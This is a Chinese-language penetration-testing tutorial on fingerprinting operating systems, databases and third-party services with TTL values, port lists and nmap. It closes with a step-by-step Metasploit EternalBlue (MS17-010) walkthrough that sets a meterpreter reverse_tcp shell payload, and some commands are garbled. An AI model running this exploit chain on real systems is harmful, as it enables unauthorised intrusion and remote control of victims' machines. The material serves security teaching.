基礎入門-系統及資料庫等
前言:
除去搭建平台中間件,網站源碼外,容易受到攻擊的還有作業系統,資料庫,第三方軟體平台等,其中此類攻擊也能直接影響到Web或伺服器的安全,導緻網站或伺服器權限的擷取。
一、作業系統層面
識别作業系統常見方法
-
通過網站或通過掃描相關軟體識别
大小寫對網頁都沒有影響,這種情況就可以認定為windows伺服器,因為windows伺服器不區分字尾大小寫。

這個網站對應的作業系統是linux伺服器
-
也可以用TTL來判斷伺服器系統,相鄰的值來判斷
(但是不準确)當使用者修改了TTL值的時候,就會誤導我們的判斷
TTL:
- WINDOWS NT/2000 TTL:128
- WINDOWS 95/98 TTL:32
- UNIX TTL:255
- LINUX TTL:64
- WIN7 TTL:64
- nmap判斷
文法:O大寫
也可以使用-A來同時啟用作業系統檢測和版本檢測。
nmap -O -A dhost
簡要兩者差別及識别意義
網站路徑、大小寫、檔案在兩個系統之間的适用性,相容性.
- 可以幫助我們明确思路
- 可以篩選掉不符合系統的情況
作業系統層面漏洞類型對應意義
漏洞類型的不同會造成利用這個漏洞時的條件
- 覆寫面廣
- 擷取的權限高
- 危害性大
簡要作業系統層面漏洞影響範圍
利用漏洞去擷取權限或者對某些服務進行幹擾
二、資料庫層面
識别資料庫類型常見方法
-
通過網站識别資料庫,通過腳本連接配接的資料庫
ASP+Access(windows) 端口:無
PHP+Mysql 端口:3306
ASPX+Mssql(windows) 端口:1433
Jsp+Mssql,oracle 端口:1521
Python+Mongodb 端口:27017
伺服器端口
- 關系型資料庫 --MySQL:3306 --SqlServer:1433 --Oracle:1521
- NOSQL資料庫 --MongoDB:27017 --Redis:6379 --memcached:11211
- 使用“-p” 選項 指定Nmap掃描特定的端口 例如掃描目标22端口。
nmap -p [端口] [ip]
- -O也可以識别出端口
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等
…等
資料庫類型差別及識别意義
每個資料庫裡面的安全機制,寫法結構都有些許不一樣,同樣産生的漏洞也不一樣。
不同資料庫對應漏洞有差異
- 資料庫的漏洞和類型相性很強
- 不同資料庫漏洞爆發點不太一樣
- 能确定資料庫類型、版本,會對滲透有很大幫助
資料庫常見漏洞類型及攻擊
- 弱密碼登入資料庫…
- sql注入
簡要資料庫層面漏洞影響範圍
得到網站管理者資料可登入背景,得到使用者資料能登入使用者資訊,進行修改,通過資料庫操作可進行漏洞攻擊,也可以擷取資料庫權限和網站權限。
三、第三方層面
為什麼要識别第三方平台或軟體
判斷有哪些第三方平台或軟體
- 多層次判斷,不能僅限于端口掃描,根據不同的應用采取不同的方法。
- – 端口掃描
- – 特征比對
nmap判斷端口服務
nmap -sV -p 13337 <target ip>
案例:
nmap -p 80 -sV 192.168.112.68
這是一個Apache HTTP伺服器。
常見第三方平台或軟體漏洞類型及攻擊
- – 可以提供額外的攻擊面-- 弱密碼
簡要第三方平台或軟體安全測試的範圍
除去正常WEB安全及APP安全測試外,類似伺服器單一或複雜的其他服務( 郵件,遊戲,負載均衡等),也可以作為安全測試目标,此類目标測試原則隻是少了WEB應用或其他安全問題。是以明确安全測試思路是很重要的!
端口掃描工具:wins nmap下載下傳位址
官網:https://nmap.org/
https://github.com/hellogoldsnakeman/masnmapscan-V1.0
四、案例示範:作業系統漏洞示範
利用:
端口445
Metasapoit工具-永恒之藍
步驟:
kali打開Msfconsole工具:
msfconsole
第一步:掃描子產品
輔助子產品是Metasploit的内置子產品
先利用search指令搜尋有哪些可用端口子產品
文法:
search portscan
第二部:選擇偵聽子產品
use exploit/multi/handler
//(開啟偵聽)
第三步:查詢漏洞
search ms17
第四步:使用漏洞
use useexploit/windows/smb/ms17_010_eternalblue
第五步:在偵聽子產品中加載payload攻擊子產品
set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcp
第六步:show options檢視是否配置完成
第七步:置一下LHOST 和 RHOSTS
set lhost 【本機的ip】
set rhosts 【被攻擊方的ip】
第八步:run運作攻擊
run
結果成功拿到對方目錄